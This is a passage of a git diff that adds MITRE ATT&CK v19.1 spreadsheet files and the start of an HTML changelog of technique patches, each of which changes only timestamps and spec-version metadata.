Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-assets.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-campaigns.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-campaigns.xlsx
new file mode 100644
index 00000000000..0a1ae6556eb
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-campaigns.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-datacomponents.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-datacomponents.xlsx
new file mode 100644
index 00000000000..43e6c0f6a38
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-datacomponents.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-detectionstrategies.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-detectionstrategies.xlsx
new file mode 100644
index 00000000000..24e8de06207
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-detectionstrategies.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-groups.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-groups.xlsx
new file mode 100644
index 00000000000..df9fbd637d4
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-groups.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-matrices.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-matrices.xlsx
new file mode 100644
index 00000000000..9f0d692cbcb
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-matrices.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-mitigations.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-mitigations.xlsx
new file mode 100644
index 00000000000..3587de20b57
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-mitigations.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-relationships.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-relationships.xlsx
new file mode 100644
index 00000000000..3d89e14e87d
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-relationships.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-software.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-software.xlsx
new file mode 100644
index 00000000000..3bbaf1456df
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-software.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-tactics.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-tactics.xlsx
new file mode 100644
index 00000000000..cee0c1d7251
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-tactics.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-techniques.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-techniques.xlsx
new file mode 100644
index 00000000000..6683855e444
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1-techniques.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1.xlsx b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1.xlsx
new file mode 100644
index 00000000000..f443640b3fc
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/ics-attack/ics-attack-v19.1.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-analytics.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-analytics.xlsx
new file mode 100644
index 00000000000..232999b46f9
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-analytics.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-campaigns.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-campaigns.xlsx
new file mode 100644
index 00000000000..8ce7c788152
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-campaigns.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-datacomponents.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-datacomponents.xlsx
new file mode 100644
index 00000000000..e4bef499548
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-datacomponents.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-detectionstrategies.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-detectionstrategies.xlsx
new file mode 100644
index 00000000000..7c5b46a18de
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-detectionstrategies.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-groups.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-groups.xlsx
new file mode 100644
index 00000000000..084a4f23dc8
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-groups.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-matrices.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-matrices.xlsx
new file mode 100644
index 00000000000..dafe7dc0c6c
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-matrices.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-mitigations.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-mitigations.xlsx
new file mode 100644
index 00000000000..894cea6526f
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-mitigations.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-relationships.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-relationships.xlsx
new file mode 100644
index 00000000000..b94caebb4d5
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-relationships.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-software.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-software.xlsx
new file mode 100644
index 00000000000..ebf591d23b8
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-software.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-tactics.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-tactics.xlsx
new file mode 100644
index 00000000000..e06b486ceed
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-tactics.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-techniques.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-techniques.xlsx
new file mode 100644
index 00000000000..c37c0a02372
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1-techniques.xlsx differ
diff --git a/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1.xlsx b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1.xlsx
new file mode 100644
index 00000000000..03be895925f
Binary files /dev/null and b/modules/resources/docs/attack-excel-files/v19.1/mobile-attack/mobile-attack-v19.1.xlsx differ
diff --git a/modules/resources/docs/changelogs/v19.0-v19.1/changelog-detailed.html b/modules/resources/docs/changelogs/v19.0-v19.1/changelog-detailed.html
new file mode 100644
index 00000000000..65b8c2d619f
--- /dev/null
+++ b/modules/resources/docs/changelogs/v19.0-v19.1/changelog-detailed.html
@@ -0,0 +1,171 @@
+<!DOCTYPE html>
+<html>
+    <head>
+        <title>ATT&CK Changes</title>
+        <meta http-equiv="Content-Type" content="text/html; charset=utf8">
+        <style type="text/css">
+            table.diff {font-family:Courier; border:medium;}
+            .diff_header {background-color:#e0e0e0}
+            td.diff_header {text-align:right}
+            .diff_next {background-color:#c0c0c0}
+            .diff_add {background-color:#aaffaa}
+            .diff_chg {background-color:#ffff77}
+            .diff_sub {background-color:#ffaaaa}
+        </style>
+    </head>
+    <body>
+<h1>ATT&CK Changes Between v19.0 and v19.1</h1><h2>Key</h2>
+<ul>
+<li>New objects: ATT&amp;CK objects which are only present in the new release.</li>
+<li>Major version changes: ATT&amp;CK objects that have a major version change. (e.g. 1.0 → 2.0)</li>
+<li>Minor version changes: ATT&amp;CK objects that have a minor version change. (e.g. 1.0 → 1.1)</li>
+<li>Other version changes: ATT&amp;CK objects that have a version change of any other kind. (e.g. 1.0 → 1.2)</li>
+<li>Patches: ATT&amp;CK objects that have been patched while keeping the version the same. (e.g., 1.0 → 1.0 but something like a typo, a URL, or some metadata was fixed)</li>
+<li>Object revocations: ATT&amp;CK objects which are revoked by a different object.</li>
+<li>Object deprecations: ATT&amp;CK objects which are deprecated and no longer in use, and not replaced.</li>
+<li>Object deletions: ATT&amp;CK objects which are no longer found in the STIX data.</li>
+</ul><table class=diff summary=Legends>
+    <tr>
+        <td>
+            <table border= summary=Colors>
+                <tr><th>Colors for description field</th></tr>
+                <tr><td class=diff_add>Added</td></tr>
+                <tr><td class=diff_chg>Changed</td></tr>
+                <tr><td class=diff_sub>Deleted</td></tr>
+            </table>
+        </td>
+    </tr>
+</table>
+<h2>Additional formats</h2>
+<p>These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.</p>
+<ul>
+    <li><a href="/docs/changelogs/v19.0-v19.1/layer-enterprise.json">Enterprise changes</a></li>
+    <li><a href="/docs/changelogs/v19.0-v19.1/layer-mobile.json">Mobile changes</a></li>
+    <li><a href="/docs/changelogs/v19.0-v19.1/layer-ics.json">ICS changes</a></li>
+</ul>
+<p>This JSON file contains the machine readble output used to create this page: <a href="/docs/changelogs/v19.0-v19.1/changelog.json">changelog.json</a></p>
+<h2>Techniques</h2><h3>enterprise-attack</h3><details><summary>Patches</summary><hr><h4>[T1548] Abuse Elevation Control Mechanism</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-21 18:05:00.504000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.639000+00:00</td></tr></tbody></table></details><hr><h4>[T1134] Access Token Manipulation</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:53:44.334000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr></tbody></table></details><hr><h4>[T1087] Account Discovery</h4><p><b>Current version</b>: 2.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:57.239000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1098] Account Manipulation</h4><p><b>Current version</b>: 2.8</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:10.273000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1557] Adversary-in-the-Middle</h4><p><b>Current version</b>: 2.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 14:18:32.903000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1574.014] Hijack Execution Flow: AppDomainManager</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:57:09.601000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.626000+00:00</td></tr></tbody></table></details><hr><h4>[T1059.002] Command and Scripting Interpreter: AppleScript</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:39.348000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.626000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1550.001] Use Alternate Authentication Material: Application Access Token</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:48:23.373000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1010] Application Window Discovery</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:44.488000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.630000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1560] Archive Collected Data</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:48.023000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.633000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1560.001] Archive Collected Data: Archive via Utility</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:19.477000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.619000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1588.007] Obtain Capabilities: Artificial Intelligence</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 16:06:03.711000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr></tbody></table></details><hr><h4>[T1573.002] Encrypted Channel: Asymmetric Cryptography</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:18.961000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.713000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1055.004] Process Injection: Asynchronous Procedure Call</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:26:41.151000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.644000+00:00</td></tr></tbody></table></details><hr><h4>[T1123] Audio Capture</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:24.702000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1683.002] Generate Content: Audio-Visual Content</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-20 15:34:51.855000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.705000+00:00</td></tr></tbody></table></details><hr><h4>[T1119] Automated Collection</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:35.995000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1020] Automated Exfiltration</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:58.340000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.642000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1197] BITS Jobs</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:57:02.003000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr></tbody></table></details><hr><h4>[T1102.002] Web Service: Bidirectional Communication</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:18.602000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.713000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1027.001] Obfuscated Files or Information: Binary Padding</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:15:33.904000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr></tbody></table></details><hr><h4>[T1564.013] Hide Artifacts: Bind Mounts</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:17:48.263000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr></tbody></table></details><hr><h4>[T1037] Boot or Logon Initialization Scripts</h4><p><b>Current version</b>: 2.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:20.077000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.619000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1542.003] Pre-OS Boot: Bootkit</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid 